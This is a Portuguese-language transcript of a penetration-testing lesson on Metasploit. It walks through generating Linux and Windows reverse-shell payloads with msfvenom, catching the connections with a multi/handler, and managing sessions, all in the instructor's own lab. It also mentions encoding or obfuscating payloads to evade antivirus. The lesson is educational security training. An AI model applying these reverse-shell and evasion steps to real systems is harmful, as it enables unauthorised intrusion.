Nessa aula, a gente vai ver como utilizar o Metasploit, tá? O Metasploit basicamente é um framework de exploração muito utilizado, provavelmente o mais conhecido de todos, tá? E nele contém exploits, então muitas vezes a gente vai ter uma CVE que tem um exploit já prontinho para explorar, tem um exploit já prontinho para explorar pelo Metasploit, tá? Pela Rapid7, como a gente já encontrou em alguns cenários. Às vezes o exploit ele existe manualmente, mas ele é muito mais fácil de explorar pelo Metasploit. Por exemplo, o Eternal Blue, tá? Uma mão na roda usar o Metasploit para explorar a famosa, né, vulnerabilidade Eternal Blue que afeta aí, o Windows. Ele tem alguns payloads, então payloads para reverse shell do Windows, payloads para reverse shell de Linux, tanto shell para x64, tanto para x32, né, x86 e por aí vai. Tá? Então tem vários payloads que a gente vai inclusive criar aqui na aula, na parte prática. Tem alguns encoders também para tu esconder os payloads, então a gente vai ver que quando a gente vai subir a reverse shell no Windows, vai dar um probleminha, né? O nosso Windows AV, por exemplo, identifica, né, essas shells mais comuns. Então tu pode usar alguns coders justamente para encodar o payload e esconder ele, pelo menos as técnicas mais comuns de identificação de programas maliciosos, porque querendo ou não, uma shell reverse já é um programa malicioso, tá? Pela natureza, né, do que faz uma reverse shell. E também tem alguns módulos auxiliares. Então, por exemplo, a gente já invadiu a máquina, já tem uma shell lá com o Meterpreter. A gente pode usar um módulo auxiliar que vai fazer a pós-enumeração, que é o assunto do próximo capítulo, tá? Então tem alguns módulos auxiliares que podem vir a calhar também. Falando de shell, uma coisa muito interessante do Metasploit é que ele tem uma shell específica do Metasploit que a gente chama de Meterpreter, basicamente, tá? Então isso a gente também vai dar uma olhadinha na aula prática, beleza? Então vamos lá. Bom, vamos lá então, pessoal. O Metasploit ele já vem por padrão instalado, tá? No Kali. E aí para chamar ele a gente pode simplesmente chamar o MSF console. Também tem o MS Venom, que faz parte da suite do Metasploit, que é utilizado para gerar os binários que vão trazer as sessões para a gente. Então, basicamente, gerar os nossos payloads, tá? Para isso, a gente pode então chamar o "-l payloads para listar os payloads e aí dar um grep em reverse, por exemplo, para trazer somente os payloads que estão relacionados a reverse shell, porque tem diversos outros payloads específicos para exploits específicos e enfim, outros cenários, tá? Então aqui a gente pode ver que tem payload para Windows x64, tá? Payload para, vamos ver o que mais, payloads genéricos sem arquitetura específica, tá? Por reverse TCP, por táticas que usam DNS, por HTTP, HTTPS, name of pipe e aí por diante, tá? E obviamente mais para cima tem para Linux, tem para PHP, e focar em Unix, tem para macOS, tá? Várias opções, tá? Então a gente pode vir aqui e pesquisar, por exemplo, para Linux barra x64. Então a gente quer para x64 de Linux, tá? E aí tem umas diferenças, tá? Parece que às vezes que os exploits são iguais. Vou até abrir o Notepad aqui. Por exemplo, esse aqui, tá? Que é o clássico reverse shell por TCP, tá? E esse cara aqui ele é stageless, tá? Ou non-staged, alguma coisa assim. E esse cara aqui, ó, vamos pegar o irmão dele, que é esse cara aqui, ó. Esse cara já é staged, tá? Galera, só fazendo um corte aqui para eu explicar um pouco melhor isso aqui, porque na aula me enrolei um pouco e vai acabar confundindo vocês, tá? Mas a gente não precisa entrar em muitos detalhes. O importante é, esse aqui ele é o mais utilizado, tá? É óbvio que depois você pode estudar um pouco mais aprofundado a diferença entre eles, mas esse é o mais utilizado, tá? Ele é melhor em ambientes instável, melhor em ambientes instáveis, tá? Por isso que normalmente ele é mais utilizado também. Ele executa tudo em somente um step, então somente um passo, tá? Então ele meio que vem, vamos botar assim, vai completo, né? Vem completo, tá? E, consequentemente, ele também faz um pouquinho mais de barulho inicial, tá? Inicial, mas ele ainda continua sendo a melhor opção para bypass de antivírus e firewall, tá? Porque assim, ele faz mais barulho inicial, mas no total, que no caso seria na execução, na execução completa, ele faz menos barulho que um staged, tá? Por quê? O staged, ele é feito em dois steps, então, dois steps, sendo que o step inicial, ele é menor. Então, acesso inicial, né, payload inicial, ele é menor, tá? Mas, no todo, ele é mais barulhento, porque ele tem que fazer duas conexões, por exemplo, né? Tanto a inicial, tanto a secundária. E aí envolve tráfego de rede, envolve mais comunicações, por isso que
footprint dele, vamos dizer assim, inicial é menor, mas no todo é maior. Tá? Essa é a diferença. Então aqui é mais quando tu precisa de algum acesso diferente no início, um exploit limitado, né? Porque como o payload dele é menor, é melhor em cenários que o exploit é limitado. Tá? Mas como eu falei, agora a gente não precisa se atentar exatamente a esses detalhes, tá? Ele também tem a vantagem de ser um pouco mais estável em caso de falha de memória, né? Porque no geral ele é mais estável por ter 2 passos, tá? Mas geralmente vamos no stageless e boa, tá bom? Então fechou. Agora vamos voltar lá para a aula. Então beleza. Vamos criar então um payload. A gente pode dar aqui msvenom. Então para executar o payload a gente pode dar um "-p" e achar o payload que a gente quer. Então nesse caso a gente vai querer esse aqui. E depois a gente vai ver como é que é um meterpreter, por exemplo, tá? Aí a gente tem que colocar algumas opções, né? No caso o lhost, então o nosso IP do nosso atacante, né? Da nossa máquina que a gente quer fazer que é o reverse shell connect. Então vamos botar aqui no 125 que é o nosso IP. E na porta, vamos colocar na porta 1337. "-f para indicar a saída, o formato da saída do arquivo. Para Linux pode ser um elf da vida, tá? Que é o elf é basicamente um ponto .exe do Linux, vamos dizer assim, né? E aí a gente bota o output, porque se você não colocar o output assim, redirecionar ele para o arquivo, ele só vai simplesmente jogar na tela pra gente, tá? Caso vocês tenham curiosidade para saber como é que é, a gente pode ver aí, tirar o redirecionamento, tá? Então aqui é basicamente um monte de dado que a gente não consegue ler direito, tá? Então beleza, a gente pode dar permissão de execução para esse cara. Opa, foi um H sem querer. E se a gente simplesmente abrir uma shell, a gente vai conseguir essa conexão, porque é um simples reverse shell TCP. Então vai funcionar normalmente. Beleza, mas a ideia é então a gente usar o Metasploit, né? Então vamos iniciar o Metasploit com msf console. E aí ele demora um pouquinho para iniciar. E aí se a gente pesquisar, vamos ver aqui, msf console, vamos pesquisar Metasploit módulos, tá? Para ver os módulos que ele tem. Acho que tem uma imagem boa também, essa aqui, ó. Então, o Hack the Box aí, ótimo conteúdo para estudar. Ele diz os diferentes tipos de módulos que o Metasploit tem. Ele tem o módulo auxiliar, o de encoders, o de exploit, o de payloads, o de plugins, o pós-exploração. Tá, e o que a gente vai utilizar aqui é o do próprio de payload, que a gente já meio que chamou ele usando o msvenom. E vamos usar o auxiliary para abrir um handler, tá? E também depois a gente vai usar o exploit para explorar um binário, tá? Mas beleza, então, vamos usar um módulo de handler, que é basicamente abrir uma porta, né, como se fosse um netcat da vida, só que um pouco mais turbinado no nosso Metasploit. Então a gente pode dar um Ctrl L aqui para limpar a tela. Vamos tirar isso aqui de fundo, para não ficar poluído a tela. Beleza, então a gente pode vir aqui e dar use exploit, tá? Normalmente é assim que começa, então use exploit, use auxiliary, use post, tá? E a gente pode dar um tabzinho para ele mostrar todas as opções para a gente, mas percebam que são muitas, tá? Então a gente pode usar o exploit, multi, então ele vai trazer algumas opções variadas do exploit, e o handler, que é o handler especificamente, tá? E aqui ele está usando o payload generic shell reverse TCP. Isso funcionaria já por padrão, mas vamos configurar especificamente o payload que a gente quer executar, que nesse caso é o mesmo payload que a gente usou para criar com o msvenom, né? Não é esse comandinho aqui, mas enfim, é o payload msvenom -p. Nesse caso não é o de Windows, né? É o de Linux. Enfim, eu lembro de cabeça aqui. Linux x64, é bem intuitivo, né, o nome. Shell Reverse TCP. Beleza, setamos o payload específico. Agora a gente pode usar o comando options para ver quais opções a gente precisa setar, né, nesse payload. Nesse caso é o lhost, que é a porta local, e o lport. Então, set lhost, o nosso endereço IP, tá? 192.168.125. E o lport, nesse caso, é 1337. Percebam que ele já colocou como padrão aqui a porta 444, tá? E ele pede se é requerido, né? Se tu precisa necessariamente preencher essa informação para executar esse módulo. E sim, a gente precisa preencher essas informações. Então, se a gente não colocasse o lhost e tentasse rodar, ele não ia funcionar, tá? Lport, eu errei? Eu tenho que botar um set, né? Set lport 1337.
E aí, beleza, com todas as opções setadas, ele pode dar um run agora. Percebam que ele já startou o nosso reverse TCP. E aí a gente pode simplesmente vir aqui executar, né, o nosso binário. Imaginando que isso aqui seria, por exemplo, a máquina vítima, tá? Então a gente dá um Enter aqui. E ele já vai trazer para nós aqui. Tá com um pouquinho de delay, eu rodei um pouco antes. Mas percebam que ele já falou aqui, ó, sessão 1 aberta dessa máquina aqui, né, para essa porta aqui. Que essa aqui seria a porta então que está atacando, que está conectando da vítima, que somos nós mesmos, basicamente, tá? Então a gente pode vir aqui, dar um Ruemai, que vocês viram que o Ruemai já deu o output aqui, a gente pode dar um ls e executar tudo normalmente. Se eu der um Ctrl Z, eu jogo essa sessão para o background, tá? E aí eu consigo fazer todas as outras coisas enquanto a minha sessão está no background, no mesmo terminal, tá? Se eu vir aqui dar um Sessions, eu consigo ver as sessões que estão ativas. Então eu poderia vir aqui e criar outra sessão, por exemplo, para a mesma vítima, tá? E para retomar a sessão, eu posso dar um Sessions-i e o número da sessão, nesse caso é o ID1, tá? E aí ele vai retomar para a gente essa sessão especificamente. Tá? Então se eu vir aqui, dou um Ruemai, dou um ls, pwd, já está retomado. Eu vou dar um Ctrl Z aqui e jogar isso aqui para o background de novo. Porque qual que vai ser a ideia de agora? Vamos rodar, vamos abrir aqui não vamos fechar aqui, né, para não matar a nossa shell. Então vamos entrar no Metasploit e aí aqui rodar vamos abrir, não, vamos fazer aqui mesmo. E aqui a gente pode rodar o comandinho então, que eu já tinha até executado, que é esse cara aqui. Vamos botar como payload Windows x64 shell reverse TCP, tá? E executar bonitinho esse cara. Beleza. Agora o que a gente pode fazer? Eu posso mover esse cara, eu posso copiar esse cara para essa shared folder, tá? Isso aqui é a minha máquina Windows, tá? Se tu quer criar é bem fácil, é só vir aqui em shared folders, shared folder settings, e aqui tu vem shared folders e cria aqui, ó. Dá um add, aí tu pode escolher aqui onde é que tu quer montar. Nesse caso eu montei aqui em downloads, por exemplo. Tu coloca o nome da pasta e aqui no caso seria o mmt/windows, aonde que vai montar no Linux, e dá um auto mount aqui para ele montar automático, e aí a gente já vai estar compartilhando, tá? Nesse caso tudo que eu colocar aqui dentro então vai jogar direto para minha pasta do downloads. Nesse caso eu tô com o drag and drop ativado, eu poderia simplesmente dar um open ponto aqui e pegar isso e arrastar para o meu Windows, né? Só que no meu caso não está funcionando porque assim, né? Às vezes não funciona direito esse guest additions e por aí vai, daria para solucionar isso, mas eu acho mais fácil usar uma shared folder, tá? E aí eu posso dar um copy. Só que assim que eu der um copy, o meu Windows já trigou, tá? Então para vocês perceberem que no mundo real não é bem assim que as coisas funcionam, tá? Teria que ofuscar minimamente esse ponto .exe para conseguir bypassar, né, o AV do Windows. Nesse caso eu vou abrir aqui e eu vou fazer o que não é muito recomendado, né, que é desligar as proteções do Windows, né, por um momentinho, para ver se eu consigo manter essa shell aqui na minha máquina. Percebam que agora ele não reclamou. E aí eu vou abrir aqui uma shell, tá? Então a gente pode vir aqui e agora dar um options, vai ter que mudar o nosso payload, né? Então o nosso payload vai ser set payload windows /x64 /shell reverse TCP, tá? E set lport como a porta 333. É basicamente isso que vai mudar. Aí agora eu posso dar um run aqui. E, bom, a amostra ainda está sendo deletada do meu Windows. Eu estou só desligando aqui todas as proteções, tá? Do Windows, basicamente vindo aqui, né, no AV e desligando tudo. Só para demonstrações, né? para vocês. Vamos ver se agora ele fica. Acho que agora ele vai ficar. E aí eu vou vir aqui, abrir um terminal e simplesmente executar, tá? O ponto .exe e vamos ver se a gente recebe então a nossa shell de volta. E beleza, ó, recebeu a nossa shell, então agora a gente está basicamente dentro do nosso Windows. E aí a gente pode dar um Ctrl Z, jogar isso para o background e basicamente agora a gente tem duas sessões. Em qualquer momento eu posso ir para a minha sessão 1 ou para a minha sessão 2. Sessions, né? Eu botei Session. Então aqui eu estou na minha sessão 1, Ruemai, sou o Kali, Ctrl Z,
Então vamos para a seção 2. Eu sou o Eduardo agora na minha própria máquina. Beleza? Então isso serve muito para quando você está fazendo um exploit de redes e você tem várias shells em diferentes máquinas, tá? Isso é muito útil, tá? E aí eu posso dar um Ctrl Z e vir aqui e dar um sessions-k maiúsculo que vai matar todas as sessões, tá? Ou um session-k e o número da sessão para matar uma sessão específica. Então vamos matar a minha sessão de Windows. Percebam que ele matou, eu poderia vir aqui e dar um K maiúsculo que ele mataria todas as sessões. Tá bem? Então, agora eu vou ativar aqui, né, de volta as minhas proteções do Windows. Beleza. E agora a gente pode ver a diferença de uma handler, né, de uma sessão por shell reverse comum e usando o Metapreter, né, que seria aí, a sessão específica do Metasploit.